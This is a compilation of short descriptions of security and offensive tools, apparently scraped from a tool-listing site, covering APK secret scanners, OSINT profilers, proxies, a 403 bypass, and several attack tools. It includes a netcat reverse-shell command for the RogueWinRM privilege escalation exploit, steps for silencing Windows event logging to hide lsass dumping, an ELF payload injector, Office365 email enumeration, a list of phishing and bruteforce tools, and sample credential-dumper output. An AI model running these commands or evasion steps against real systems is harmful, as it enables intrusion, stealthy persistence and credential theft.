Scanning APK file for URIs, endpoints& secrets.

To install apkLeaks, simply:

$ git clone https://github.com/dwisiswant0/apkleaks
$ cd apkleaks/
$ pip install -r requirements.txt

Or download at release tab.

Install global packages:

$ sudo apt-get install libssl-dev swig -y

$ brew install openssl swig

You need to install:

• OpenSSL, and
• swig-win.

Basically,

$ python apkleaks.py -f ~/path/to/file.apk

usage: apkleaks [-h] -f FILE [-o OUTPUT] [-p PATTERN]

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  APK file to scanning
  -o OUTPUT, --output OUTPUT
                        Write to file results (NULL will be saved into random
                        file)
  -p PATTERN, --pattern PATTERN
                        Path to custom patterns JSON

In general, if you don't provide -o argument, then it will generate results file automatically.

Custom patterns can be added with the following flag --pattern /path/to/rules.json to provide sensitive search rules in the JSON file format. For example,

// rules.json
{
  "Amazon AWS Access Key ID": "AKIA[0-9A-Z]{16}",
  ...
}

$ python apkleaks.py -f /path/to/file.apk -c rules.json -o ~/Documents/apkleaks-resuts.txt

Current version is v1.0.2, and still development.

Since this tool includes some contributions, and I'm not an asshole, I'll publically thank the following users for their help and resource:

• @ndelphit - for his inspiring apkurlgrep, that's why this tool was made.
• @dxa4481 and y'all who contribute to truffleHogRegexes.
• @GerbenJavado& @Bankde - for awesome pattern to discover URLs, endpoints & their parameters from LinkFinder.
• @tomnomnom - a gf patterns.
• @pxb1988 - for awesome APK dissambler dex2jar.
• @ph4r05 for standalone APK parser.

An API for analyzing & finding a person profile across +300 social media websites. It includes different string analysis and detection modules, you can choose which combination of modules to use during the investigation. The detection modules utilize a rating mechanism based on different detection techniques, which produces a rate value that starts from 0 to 100 (No-Maybe-Yes)

If you have a detection, please submit it in a pull request!

-------------------------------------              ---------------------------------
|        Secuirty Testing           |              |        Social-Analyzer        |
-------------------------------------              ---------------------------------
|   Passive Information Gathering   |     <-->     |   Find Social Media Profiles  |
|                                   |              |                               |
|    Active Information Gathering   |     <-->     |    Post Analysis Activities   |
--------------------------------   -----              ---------------------------------

• String Analysis
• Search Engine Lookup
• Multi Layers detections
• Most Common Names & Words
• Convert Numbers to Letters
• Find Profles Normal (Fast)
• Find Profles Advacned (Slow)
• Find Profles Special (Slow)
• Profile Screenshot
• And more!

add-apt-repository ppa:mozillateam/ppa
apt-get update
apt-get install -y firefox-esr tesseract-ocr
git clone https://github.com/qeeqbox/social-analyzer.git
cd social-analyzer
npm install
npm start

git clone https://github.com/qeeqbox/social-analyzer.git
cd social-analyzer
sudo docker build -t social-analyzer . && sudo docker run -p 9005:9005 -it social-analyzer

• api.duckduckgo, google api, nodejs, bootstrap, selectize, jquery and font-awesome

• This tool meant to be used localy (It does not have any type of Access Control)
• If you want your website to be excluded from this project, please reach out to me!

Swiss Army Knife Proxy for rapid deployments. Supports multiple operations such as request/response dump, filtering and manipulation via DSL language, upstream HTTP/Socks5 proxy. Additionally a replay utility allows to import the dumped traffic (request/responses with correct domain name) into burp or any other proxy by simply setting the upstream proxy to proxify.

▶ tar -xvf proxify-linux-amd64.tar
▶ mv proxify-linux-amd64 /usr/local/bin/proxify
▶ proxify -version

▶ GO111MODULE=on go get -u github.com/projectdiscovery/proxify/cmd/proxify

▶ git clone https://github.com/projectdiscovery/proxify.git; cd proxify/cmd/proxify; go build; cp proxify /usr/local/bin; proxify -version

▶ proxify -h

▶ proxify -addr ":8081" -http-proxy http://127.0.0.1:8080

▶ proxify -socks5-proxy socks5://127.0.0.1:9050

▶ proxify -output db

▶ proxify -dns-addr ":53" -dns-mapping "www.google.it:192.168.1.1" -dns-resolver "1.1.1.1:53"

▶ proxify -request-dsl "contains(request,'firefox')" -response-dsl "contains(response, md5('test'))"

▶ proxify -request-match-replace-dsl "replace(request,'firefox','chrome')" -response-match-replace-dsl "regex(response, '^authentication failed$', 'authentication ok')"

▶ replay -output "logs/"

proxify -addr "127.0.0.1:8081" -http-proxy "http://127.0.0.1:8080"

User Options > Upstream Proxy > Proxy & Port > 127.0.0.1 & 8081

proxify -output chrome-logs -addr ":9999"

/Applications/Chromium.app/Contents/MacOS/Chromium --ignore-certificate-errors --proxy-server=http://127.0.0.1:9999 &

proxify -output ffuf-logs -addr ":9999"

ffuf -x http://127.0.0.1:9999 FFUF_CMD_HERE

Just a powershell scripts for auditing security with CIS BEST Practices Windows 10 and Window Server 2016 You just need to run the script, it will create a directory named : AUDIT_CONF_%DATE%

The directory output will contain the files belows:

-Antivirus-%COMPUTERNAME% : List installed Antivirus software

-APPDATA%COMPUTERNAME% : List all executable file in APPDATA directory

-Audit%DATE%: list the result of all CIS tests

-auditpolicy-%COMPUTERNAME% : audit policy configured

-firewall-rules-%COMPUTERNAME% : List all local windows firewall rules

-gpo-%COMPUTERNAME% : Gpresult for applied GPO

-Installed-Software-%COMPUTERNAME% : List installed software

-Listen-port-%COMPUTERNAME% : netstat with associate executable

-localuser-%COMPUTERNAME% : list all local users

-OptionnalFeature-%COMPUTERNAME% :List all enabled optional feature

-Scheduled-task-%COMPUTERNAME% : list all scheduled task

-Service-%COMPUTERNAME% : list all service

-Share-%COMPUTERNAME% : list all share

-StartUp-%COMPUTERNAME% : check registry to identify start-up executable

-System-%COMPUTERNAME% : systeminfo

-SystemUpdate : Check Wmi Quickfix to identify installed update

Work In Progress

1. Zphisher - Automated Phishing Tool




2. Onex - A Library Of Hacking Tools For Termux And Other Linux Distributions




3. Nexphisher - Advanced Phishing Tool For Linux & Termux




4. Hijacker - All-in-One Wi-Fi Cracking Tools for Android






 


5. ANDRAX - Penetration Testing on Android
 


6. EagleEye - Stalk Your Friends. Find Their Instagram, FB And Twitter Profiles Using Image Recognition And Reverse Image Search




7. HackingTool - ALL IN ONE Hacking Tool For Hackers




8. GoGhost - High Performance, Lightweight, Portable Open Source Tool For Mass SMBGhost Scan




9. Web Hacker's Weapons - A Collection Of Cool Tools Used By Web Hackers




10. TEA - Ssh-Client Worm




11. RedRabbit - Red Team PowerShell Script




12. Hacktronian - All In One Hacking Tool For Linux & Android




13. SocialBox - A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter)




14. BitCracker - BitLocker Password Cracking Tool (Windows Encryption Tool)




15. SQLMap - Automatic SQL Injection And Database Takeover Tool






 


16. WiFi Bruteforcer - Android application to brute force WiFi passwords (No Root Required)




17. TeleGram-Scraper - Telegram Group Scraper Tool (Fetch All Information About Group Members)




18. CQTools - The New Ultimate Windows Hacking Toolkit




19. Hack-Tools - The All-In-One Red Team Extension For Web Pentester




20. uDork - Google Hacking Tool

RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running (default on Win10 but NOT on Windows Server 2019).

Briefly, it will listen for incoming connection on port 5985 faking a real WinRM service.
It's just a minimal webserver that will try to negotiate an NTLM authentication with any service that are trying to connect on that port.
Then the BITS service (running as Local System) is triggered and it will try to authenticate to our rogue listener. Once authenticated to our rogue listener, we are able to impersonate the Local System user spawning an arbitrary process with those privileges.

You can find a full technical description of this vulnerability at this link --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/

RogueWinRM

Mandatory args:
-p <program>: program to launch

Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output

Running an interactive cmd:

RogueWinRM.exe -p C:\windows\system32\cmd.exe

Running netcat reverse shell:

RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"

• Antonio Cocomazzi
• Andrea Pierini
• Roberto (0xea31)

Oblivion is a tool focused in real time monitoring of new data leaks, notifying if the credentials of the user has been leak out. It's possible too verify if any credential of user has been leak out before. The Oblivion have two modes:

• Oblivion Client: graphical mode.
• Oblivion Server: mode with API functionalities.

NOTE: The Oblivion Client and the Oblivion Server are independents.

Oblivion Client

Oblivion Server

For configuration or usage of Oblivion please read the documentation. All the steps were careful explained with images and examples.

Thanks and credits

• Peter Kleissner and the Intelligence X team
• Alejandro Caceres (Scylla)
• khast3x
• Daniel Miessler
• Gustavo Melgaço
• Alberico de Castro
• Eliabe Kaique

HyperDbg is designed with a focus on using modern hardware technologies to provide new features to the reverse engineering world. It operates on top of Windows by virtualizing an already running system using Intel VT-x and Intel PT. This debugger aims not to use any APIs and software debugging mechanisms, but instead, it uses Second Layer Page Table (a.k.a. Extended Page Table or EPT) extensively to monitor both kernel and user executions.

Using TLB-splitting, and having features such as measuring code coverage and monitoring all mov(s) to/from memory by a function, makes HyperDbg a unique debugger.

Although it has novel features, HyperDbg tries to be as stealth as possible. It doesn’t use any debugging APIs to debug Windows or any application, so classic anti-debugging methods won’t detect it. Also, it resists the exploitation of time delta methods (e.g., RDTSC/RDTSCP) to detect the presence of hypervisors, therefore making it much harder for applications, packers, protectors, malware, anti-cheat engines, etc. to discover the debugger.

• Classic EPT Hook (Hidden Breakpoint) [link][link]
• Inline EPT Hook (Inline Hook) [link][link]
• Monitor Memory For R/W (Emulating Hardware Debug Registers Without Limitation) [link][link]
• SYSCALL Hook (Disable EFER & Handle #UD) [link][link]
• SYSRET Hook (Disable EFER & Handle #UD) [link][link]
• CPUID Hook & Monitor [link]
• RDMSR Hook & Monitor [link]
• WRMSR Hook & Monitor [link]
• RDTSC/RDTSCP Hook & Monitor [link]
• RDPMC Hook & Monitor [link]
• VMCALL Hook & Monitor [link]
• Debug Registers Hook & Monitor [link]
• I/O Port (In Instruction) Hook & Monitor [link]
• I/O Port (Out Instruction) Hook & Monitor [link]
• MMIO Monitor
• Exception (IDT < 32) Monitor [link][link]
• External-Interrupt (IDT > 32) Monitor [link][link]
• Running Automated Scripts [link]
• Transparent-mode (Anti-debugging and Anti-hypervisor Resistance) [link]
• Running Custom Assembly In Both VMX-root, VMX non-root (Kernel & User) [link]
• Checking For Custom Conditions [link][link]
• Script Engine [link][link][link]
• VMX-root Compatible Message Tracing [link]
• Powerful Kernel Side Scripting Engine [link][link]
• Event Forwarding (#DFIR) [link][link]
• Transparent Breakpoint Handler
• Various Custom Scripts [link]

(not released yet !)

Please visit Build & Install and Quick Start for a detailed explanation of how to start with HyperDbg.

We explained about how HyperDbg internally works and how we designed its features in details, take a look at :

(https://docs.hyperdbg.com/design)

Here's a diagram that shows how HyperDbg works ! 

The plugin framework is not ready for the current version of HyperDbg. Future versions will support plugins.

Contributing in HyperDbg is super appreciated.

If you want to create a pull request or contribute in HyperDbg please read Contribution Guide.

byp4xx.sh

    __                __ __           
   / /_  __  ______  / // / _  ___  __
  / __ \/ / / / __ \/ // /_| |/_/ |/_/
 / /_/ / /_/ / /_/ /__  __/>  <_>  <  
/_.___/\__, / .___/  /_/ /_/|_/_/|_|  
      /____/_/                        

A bash script to bypass "403 Forbidden" responses with well-known methods discussed in #bugbountytips

Installation:

git clone https://github.com/lobuhi/byp4xx.git
cd byp4xx
chmod u+x byp4xx.sh

Usage: Start URL with http or https.

./byp4xx.sh [OPTIONS] http(s)://url/path

OPTIONS:
  -c Return the entire curl command if response is 200
  -r Redirects if the response is 3XX

Example:

./byp4xx.sh https://www.google.es/test

Features:

• Multiple HTTP verbs/methods
• Multiple methods mentioned in #bugbountytips
• Multiple headers: Referer, X-Custom-IP-Authorization...
• Allow redirects
• Return the entire curl command if response is 200

Tips:

• You can add proxychains to use with BurpSuite
• Interlace is a good option for multithreading multiples URLs

urlhunter is a recon tool that allows searching on URLs that are exposed via shortener services such as bit.ly and goo.gl. The project is written in Go.

A group named URLTeam (kudos to them) are brute forcing the URL shortener services and publishing matched results on a daily basis. urlhunter downloads their collections and lets you analyze them.

You can download the pre-built binaries from the releases page and run. For example:

tar xzvf urlhunter_0.1.0_Linux_amd64.tar.gz

./urlhunter --help

1. Install Go on your system

2. Run: go get -u github.com/utkusen/urlhunter

Note For The Windows Users: urlhunter uses XZ Utils which is pre-installed on Linux and macOS systems. For Windows systems, you need to download it from https://tukaani.org/xz/

urlhunter requires 3 parameters to run: -keywords, -date and -o.

For example: urlhunter -keywords keywords.txt -date 2020-11-20 -o out.txt

You need to specify the txt file that contains keywords to search on URLs. Keywords must be written line by line. You have three different ways to specify keywords:

Single Keyword: urlhunter will search the given keyword as a substring. For example:

acme.com keyword will both match https://acme.com/blabla and https://another.com/?referrer=acme.com

Multiple Keywords: urlhunter will search the given keywords with an AND logic. Which means, a URL must include all the provided keywords. Keywords must be separated with , character. For example:

acme.com,admin will match https://acme.com/secret/adminpanel but won't match https://acme.com/somethingelse

Regex Values: urlhunter will search for the given regex value. In the keyword file, the line that contains a regular expression formula must start with regex string. The format is: regex REGEXFORMULA. For example:

regex 1\d{10} will match https://example.com/index.php?id=12938454312 but won't match https://example.com/index.php?id=abc223

urlhunter downloads the archive files of the given date(s). You have three different ways to specify the date:

Latest: urlhunter will download the latest archive. -date latest

Single Date: urlhunter will download the archive of the given date. Date format is YYYY-MM-DD.

For example: -date 2020-11-20

Date Range: urlhunter will download all the archives between given start and end dates.

For example: -date 2020-11-10:2020-11-20

You can specify the output file with -o parameter. For example -o out.txt

Archive.org throttles the speed when downloading files. Therefore, downloading an archive takes more time than usual. As a workaround, you can download the archives via Torrent and put them under the archive/ folder which is located in the same directory with the urlhunter's binary. The directory tree will look like:

|-urlhunter
|---urlhunter(binary)
|---archive
|-----urlteam_2020-11-20-11-17-04
|-----urlteam_2020-11-17-11-17-04

urlhunter might be useful for cyberintelligence and bug bounty purposes. For example:

docs.google.com/a/acme.comdrive.google.com/a/acme.com keywords allow you to find public Google Docs&Drive share links of Acme company.

acme.com,password_reset_token keyword may allow you to find the working password reset tokens of acme.com

trello.com allows you to find public Trello addresses.

Special thanks to Samet(@cyanpiny) who gave me the idea of this tool.

MOSINT is an OSINT Tool for emails. It helps you gather information about the target email.

• Verification Service { Check if email exist }
• Check social accounts with Socialscan
• Check data breaches
• [need API] Find related emails
• Find related phone numbers
• Find related domains
• Scan Pastebin Dumps
• Google Search
• DNS Lookup

[
  {
    "verify-email.org API Key": "set API KEY here",
    "hunter.io API Key": "set API KEY here",
    "Breached Sites[leak-lookup.com API Key]": "set API KEY here",
    "Social Scan": "True",
    "Leaked DB": "True",
    "Related Phone Numbers" : "True",
    "Related Domains" : "True",
    "Pastebin Dumps": "True",
    "Google Search": "True",
    "DNS Lookup": "True"
  }
]

[not required to run the program]

Save your API key in the config.json

git clone https://github.com/alpkeskin/mosint.git

cd mosint

pip3 install -r requirements.txt

• You can edit the config.json file

python3 mosint.py

• Set Target Email

Also, you can exit by pressing the q key.

• Kali Linux
• Parrot OS
• MacOS (without SocialScan module)

Cross-Site Scripting (XSS) is one of the most well known web application vulnerabilities. It even has a dedicated chapter in the OWASP Top 10 project and it is a highly chased vulnerability in bug bounty programs.

The scanner gets a link from the user and scan the website for XSS vulnerability by injecting malicious scripts at the input place. The injection happens in headless browser named Chromium and controlled by Puppeteer automation.

It works in two steps:

1. Find the target: In this first step, the tool tries to identify all the places at the page including injectable parameters in forms, URLs, headers, etc.
2. Test for XSS: For each place discovered in the previous step, the scanner will try to detect if the parameters are vulnerable to Cross-Site Scripting. The tool injects a piece of JavaScript code, including some special HTML characters (>, <, ", ') and it will try to see if they are returned in the response page without sanitization. If the tool detects at least one vulnerability, it will return that the website have XSS vulnerability.

• Puppeteer
• Javascript
• NodeJS
• Express

Clone the repository:

git clone https://github.com/MariaGarber/XSS-Scanner.git

Enter the clonned folder:

cd XSS-Scanner

Install the dependencies:

npm install

Run the application:

npm start

Open the browser at http://localhost:4000/

This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging.

Grap the latest verison from here. EvtMuteHook.dll contains the core functionality, once it is injected it will apply a temporary filter which will allow all events to be reported, this filter can be dynamically updated without having to reinject. I've written SharpEvtMute.exe which is a C# assembly that can easily run via execute in shad0w or execute-assembly in cobalt strike. I will be writing a native version in C for much better intergration with shad0w.

A trivial use case would be to disable event logging system wide. To do this we can use the following yara rule.

rule disable { condition: true }

We will need to start by injecting the hook into the event service.

.\SharpEvtMute.exe --Inject

Now that the hook is placed we can add the filter.

.\SharpEvtMute.exe --Filter "rule disable { condition: true }"

Now all events will be dropped by the event service.

Filters can be dynamically changed without having to reinject a hook. This makes it quick and easy to update the active filter.

An example of a more complex filter would be this. It is capable of blocking the events related to a lsass memory dump from being reported by sysmon.

rule block_lsass_dump {
    meta:
        author = "@_batsec_"
        description = "Prevent lsass dumping being reported by sysmon"
    strings:
        $provider = "Microsoft-Windows-Sysmon"
        $image = "lsass.exe" nocase
        $access = "GrantedAccess"
        $type = "0x1fffff"
    condition:
        all of them
}

With a complex rule like this it is much harder to condense it into a single line. This is why I added the ability to give base64 encoded rules.

The rule can easily be converted to base64 from a linux command line.

base64 -w 0 YaraFilters/lsassdump.yar | echo $(</dev/stdin)

Then using the --Encoded flag we can pass it as a filter

When injecting the hook SharpEvtMute.exe will call CreateRemoteThread and this call is made before the hook is placed so it will be reported by Sysmon. This is because the injection feature of SharpEvtMute.exe should only be used as a PoC. I recommend manually injecting EvtMuteHook.dll into the event logging service when stealth is important.

It's pid can be found by running SharpEvtMute.exe --Pid. The hook can be placed by manually injecting the shellcode (run make in EvtMuteBin) via your C2 framework of choice, e.g shinject in shad0w.

It is also worth mentioning that the hook will use a named pipe to update filters. The named pipe is called EvtMuteHook_Rule_Pipe (this named can be changed easily). There is a rule hard baked into the hook to ensure that any events including this name will be dropped automatically but it will still be an IOC having it listening, so I recommend changing it.

If you create some useful filters feel free to make a pull request to the YaraFilters directory. It would be cool to have a good collection of filters to hide common actions that everyone can benefit from.

drow is a command-line utility that is used to inject code and hook the entrypoint of ELF executables (post-build). It takes unmodified ELF executables as input and exports a modified ELF contianing an embedded user-supplied payload that executes at runtime.

Drow takes the following steps to create the new patched ELF:

1. Map in the umodified target ELF executable and the user-supplied payload, a position-independent blob
2. Locate the first executable segment by parsing program headers
3. Locate the last section in the executable segment by parsing section headers
4. Expand the last section (in the segment) section header's sh_size and program header's p_memsz/p_filesz by the size of the user-supplied payload
5. Fixup section headers' sh_offset's and program headers' p_offset's (move down sections and segments to make room for the payload and a small "stager stub")
6. Fix offsets in the ELF header (e_shoff, e_phoff, etc..)
7. Modify the ELF header e_entry (ELF entrypoint offset) to point to the injected code
8. Create a new ELF containing the injected code and modified ELF headers

In addition to injecting the user-supplied payload, drow injects a small code stub that is prepended to the beginning of the payload. This stub is designed to call into the payload. If the payload is written to return to the caller, after the payload returns the stager then tailcalls into _start, restoring execution so the program can run as intended.

Install gcc and scons. Then run scons from the root of the directory.

In addition to building drow, this project also builds a Linux x86-64 payload named rappers_delight.bin that simply prints to stdout. This can be used for testing. Currently, drow only works with ELF64 files targetting x86-64.

There has been a lot of open source work done in this domain. I encourage you to also check out the following projects and associated publications:

• The Cerberus ELF Interface: http://phrack.org/issues/61/8.html
• The Backdoor Factory: https://github.com/secretsquirrel/the-backdoor-factory
• ELFSH: http://www.eresi-project.org/

HackTools, is a web extension facilitating your web application penetration tests, it includes cheat sheets as well as all the tools used during a test such as XSS payloads, Reverse shells and much more.

With the extension you no longer need to search for payloads in different websites or in your local storage space, most of the tools are accessible in one click. HackTools is accessible either in pop up mode or in a whole tab in the Devtools part of the browser with F12.

• Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat)
• Shell Spawning (TTY Shell Spawning)
• XSS Payloads
• Basic SQLi payloads
• Local file inclusion payloads (LFI)
• Base64 Encoder / Decoder
• Hash Generator (MD5, SHA1, SHA256, SHA512, SM3)
• Useful Linux commands (Port Forwarding, SUID)
• RSS Feed (Exploit DB, Cisco Security Advisories, CXSECURITY)
• CVE Search Engine
• Various method of data exfiltration and download from a remote machine

You can download the latest buildhere.

Or, you can download the extension on the chorme web storethere.

Otherwise, if you want to build the project yourself from the source code

You can download HackTools on the Firefox browser add-onshere.

yarn install && yarn build

Once the build is done correctly, webpack will create a new folder called dist

After that you need to go to the extension tab on your chrome based navigator and turn on the developer mode

Then click on the load unpacked button in the top left corner

Once you clicked on the button you just need to select the dist folder and that's it !

SARENKA is an Open Source Intelligence (OSINT) tool which helps you obtaining and understanding Attack Surface.

The main goal is to gathering infromation from search engines for Internet-connected devices (https://censys.io/, https://www.shodan.io/). It scraps data about Common Vulnerabilities and Exposures (CVE), Common Weakness Enumeration (CWE) and also has database where CVEs are mapped to CWE.

It returns data about local machine - local installed softwares (from Windows Registry), local network information (python libraries, popular cmd commads).

For now application has also simple tools like hash calcualtor, shannon entropy calculator and very simple port scanner. More cryptography-math tools and reconnaissance scripts are planned.

Realtion beetwen CWE and CVE - sarenka data feeder

Generating this file takes a long time e.g: 702.5641514

https://raw.githubusercontent.com/pawlaczyk/sarenka_tools/master/cwe_all.json

In progress

In progress

Description in progress

Description in progress Sarenka is local web application for Windows.

Rirst release gathers data from two search engines. example sarenka/backend/connectors/credentials.json

{   
    "censys": {
        "base_url": "https://censys.io/",
        "API_ID": "<my_user>",
        "Secret": "<my_api_key>",
        "API_URL": "https://censys.io/api/v1"
    },
    "shodan": {
        "base_url": "https://www.shodan.io/",
        "user": "<my_user>",
        "api_key": "<my_api_key>"
    }
}

• gets data from https://censys.io/ by ip
• get data from https://www.shodan.io/ by ip
• get DNS data
• get WHOIS data
• banner grabbing
• find CVEs by CWE
• generatre pdf report

You can also:

• calculate hashes based on user string
• calculate shannon entropy based on user string
• check is port open|closed (instead always use nmap if you can - it's slow)

This is tricki part, because we have 863 sqlite3 database files: default, CWE-NONE (some CVE hasn't cwe_id eg.: CVE-2013-3621) and 861 individual for CWEs

Description in progress.

SARENKA uses a number of open source projects to work properly on:

• Renderforest - logo generator
• gawk - python manage.py migrate --database CWE_ID
• chocolatey
• PyCharm - Community Edition
• Technology - description
• Technology - description
• Technology - description
• Technology - description
• Technology - description
• Technology - description
• Technology - description
• Technology - description
• Technology - description
• Technology - description

And of course SARENKA itself is open source with a public repository on GitHub.

• Rewrite documentation in English (end of 2021)
• trello/ github instead of Jira
• Cover 100% code by tests
• typing backend
• document all functions and class
• Docker
• online demo
• Jenkins
• GraphQL
• Selenium Scrapers
• More pentesting tools
• Google Dorks
• Abstract Algebra calculator
• Number Theory calculator
• Server certificate validator
• tests on Linux
• NLP
• d3js visualizations
• alterntive pure version in command lineS

• https://circleci.com/
• https://github.com/snyk-bot

• Tested on Windows 10
• Tested on Kali Linux kali-rolling 2020.2

Till end of March, 2021 documentation will be available only in Polish! The documentation is availabe here.

A script that can see if an email address is valid in Office365. This does not perform any login attempts, is unthrottled, and is incredibly useful for social engineering assessments to find which emails exist and which don't.

Microsoft does not consider "email enumeration" a vulnerability, so this is taking advantage of a "feature". There are a couple other public Office365email validation scripts out there, but they all (that I have seen) require at least 1 login attempt per user account. That is detectable and can be found as a light bruteforce attempt (1 "common" password across multiple accounts).

This script allows for email validation with zero login attempts and only uses Microsoft's built-in Autodiscover API so it is invisible to the person/company who owns the email address. Furthermore, this API call appears to be completely unthrottled and I was able to validate over 2,000 email addresses within 1 minute in my testing.

The script is actually really basic and easy to use. You make a file of the emails you want to see are valid or not and pass it as an argument to the script. Or you can provide a file just of usernames and give the -s argument to automatically append a suffix to each entry:

Usage: UhOh365.py [-h] [-v] [-t THREADS] [-o OUTPUT] file

positional arguments:
  file                  Input file containing one email per line

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Display each result as valid/invalid. By default only displays valid
  -s, --suffix	    Add a domain suffix to every input line from file (e.g: contoso.com)
  -t THREADS, --threads THREADS
                        Number of threads to run with. Default is 20
  -o OUTPUT, --output OUTPUT
                        Output file for valid emails only
  -n, --nossl           Turn off SSL verification. This can increase speed if
                        needed
  -p PROXY, --proxy PROXY
                        Specify a proxy to run this through (eg: 'http://127.0.0.1:8080')

This is actually a very easy thing to do. It turns out the /autodiscover/autodiscover.json/v1.0/{EMAIL}?Protocol=Autodiscoverv1 API endpoint returns different status codes for if an email exists in o365 or not. 200 status code means it exists, a 302 means it doesn't exist.

If the email does exist:

If the email does not exist:

Notice this request takes zero authentication or identifying parameters and it does not cause a login attempt on the target account.

Chris King

raikiasec@gmail.com

@raikiasec

A python script which allows you to parse GeoLocation data from your Image files stored in a dataset.It also produces output in CSV file and also in HTML Google Maps

To run this script fluently , (1) You should have Google Maps API (2) You should enable Map JavaScript API in Console

To get an API key,See this documentation... https://developers.google.com/maps/documentation/javascript/get-api-key

git clone https://github.com/monishmonish/exif-gps-tracer/
cd exif-gps-tracer/
pip3 install --r requirements.txt
python3 plotmap.py

Enter the path of the Dataset folder which contains Images to parse the exif GeoLocation data

Automatically it will store the Lattitude & Longitude coordinates with their respective time stamp in a CSV file excluding "None" values of Lat,Lon in GeoLocation

If GeoTags are not available in an image,It skips them by printing its filename

An HTML file will be generated by running this script,by opening the HTML file,

You can see the scattered plots of the Lattitude & Longitude coordinates in Google Map

The more scattered region has the highest probability of the victim/target to be in that area.

This plot is purely based on the exif metadata of the Image dataset.

Add a circular heat zone showing the probability of target's existence in that region

Credential Dumping Tool for SolarWinds Orion

Blog post: https://malicious.link/post/2020/solarflare-release-password-dumper-for-solarwinds-orion/

Credit to @asolino, @gentilkiwi, and @skelsec for helping me figuring out DPAPI.

============================================
| Collecting RabbitMQ Erlang Cookie
|       Erlang Cookie: abcdefg12456789abcde
============================================
| Collecting SolarWinds Certificate
|       SolarWinds Orion Certificate Found!
|       Subject Name: CN=SolarWinds-Orion
|       Thumbprint  : BE85C6C3AACA8840E166187B6AB8C6BA9DA8DE80
|       Password    : alcvabkajp4
|       Private Key : MIIKHwIBAzCCCd8GCSqGSIb3DQEHAaCCCdAEggn<snip>
============================================
| Collecting Default.DAT file
|       Encrypted: 01000000D08C9DDF0115D<snip>
|       Decrypted: 5D3CE5B08C9201E636BCF<snip>
============================================
| Collecting Database Credentials          |
|       Path to SWNetPerfMon.DB is: C:\Program Files (x86)\SolarWinds\Orion\SWNetPerfMon.DB
|       Connection String: Server=(local)\SOLARWINDS_ORION;Database=SolarWindsOrion;User ID=SolarWindsOrionDatabaseUser;Password=SUPERSECRETPASSWORDHERE
|       Number of database credentials found: 1
============================================
| Connecting to the Database              |
|       Successfully connected to: Server=(local)\SOLARWINDS_ORION;Database=SolarWindsOrion;User ID=SolarWindsOrionDatabaseUser;MultipleActiveResultSets=true
============================================
| DB - Exporting Key Table                 |
|       KeyID: 1
|       Encrypted Key: LmjknGhSXTC<snip>
|       Kind: Aes256
|       Purpose: master
|       Protection Type: 1
|       Protection Value: BE85C6C3AACA8<snip>
|       Protection Detai   ls: {}
------------------------------------------------
|       KeyID: 2
|       Encrypted Key: //pj6a4FaCyfv/Rgs<snip>
|       Kind: Aes256
|       Purpose: oldcryptohelper
|       Protection Type: 0
|       Protection Value: 1
|       Protection Details: {"IV":"oj3JCT7Cft<snip>"}
============================================
| DB - Exporting Accounts Table            |
|        Account: _system
|        Password Hash: qE9ClH<snip>
|        Password Salt: XgtO8XNWc/KiIdglGOnxvw==
|        Hashcat Mode 12501: $solarwinds$1$XgtO8XNWc/KiIdglGOnxvw==$qE9ClHDI<snip>
|        Account Enabled: Y
|        Allow Admin: Y
|        Last Login: 12/15/2020
--------------------------------------------
|        Account: Admin
|        Password Hash: IfAEwA7LXxOAH7ORCG0ZYeq<snip>
|        Passwor   d Salt: jNhn3i2XtHfY8y4EOmNdiQ==
|        Hashcat Mode 12501: $solarwinds$1$jNhn3i2XtHfY8y4EOmNdiQ==$IfAEwA7LXxOAH7ORCG0ZY<snip>
|        Account Enabled: Y
|        Allow Admin: Y
|        Last Login: 12/02/2020
--------------------------------------------
|        Account: Guest
|        Password Hash: Y/EMuOWMNfCd<snip>
|        Salt is NULL in DB so lowercase username is used: guest
|        Hashcat Mode 12500: $solarwinds$0$guest$Y/EMuOWMNfCd<snip>
|        Account Enabled: N
|        Allow Admin: N
|        Last Login: 12/30/1899
--------------------------------------------
|        Account: iprequest
|        Password Hash: 7zskGWFukuHuwQ<snip>
|        Salt is NULL in DB so lowercase username is used: iprequest
|        Hashcat Mode 12500: $solarwinds$0$iprequest$7zskGWFukuHuwQ<snip>
|        Account Enabled: Y
|        Allow Admin: N
|        Last Login: 01/01/1900<   br/>--------------------------------------------
|        Account: SITTINGDUCK\uberolduser
|        Password: 11-417578424799297-9-6260697430795685763067724
|        Decoded Password: ASDQWE123
|        Hashcat Mode 21500: $solarwinds$0$admin$fF1lrlOXfxVz51Etjcs18XNK+Zt3keV2AllH9cYtGzdt5Yg2TtcsU84G9+5VVFMIUorR5eNJzX/1kmef6wZfrg==
|        Account Enabled: Y
|        Allow Admin: N
|        Last Login: 11/15/2015
|        Account SID: S-1-5-21-1000000000-2000000000-3000000000-50000
|        Group: SITTINGDUCK\Domain Admins
--------------------------------------------
============================================
| DB - Exporting Credentials Table         |
------------------1--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: _system
|       Desc: Cortex Integration
|       Owner: CORE
|               Password: 9dM-5pH/&amp;Y(KU-v
|                  Username: _system
------------------1--------------------------
------------------2--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: JobEngine
|       Desc: Job Engine router TCP endpoint credentials
|       Owner: JobEngine
|               Password: +fBByxJFsK+da6ZN2wKvLTKC/PWUzFlfIvvwtW/XqvA=
|               Username: KWPPhiYJmE8+fRF6qlkxulK2tf3t79TQOAk1ywBMVOI=
------------------2--------------------------
------------------3--------------------------
| Type: SolarWinds.Orion.Core.Models.Credentials.SnmpCredentialsV2
| Name: public
|       Desc:
|       Owner: Orion
|               Community: public
------------------3--------------------------
------------------4--------------------------
| Type: SolarWinds.Orion.Core.Models.Credentials.Sn   mpCredentialsV2
| Name: private
|       Desc:
|       Owner: Orion
|               Community: private
------------------4--------------------------
------------------5--------------------------
